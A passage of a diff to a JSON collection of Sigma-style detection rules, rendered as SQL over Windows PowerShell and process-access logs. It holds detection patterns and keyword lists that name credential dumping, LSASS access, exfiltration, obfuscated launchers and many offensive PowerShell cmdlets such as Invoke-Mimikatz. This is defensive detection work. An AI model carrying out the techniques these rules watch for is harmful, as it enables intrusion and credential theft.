"SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "status": "test", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", - "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", @@ -6161,39 +5692,38 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "PowerShell Remote Session Creation", - "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "author": "frack113", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "posh_ps_remote_session_creation.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6202,250 +5732,291 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE 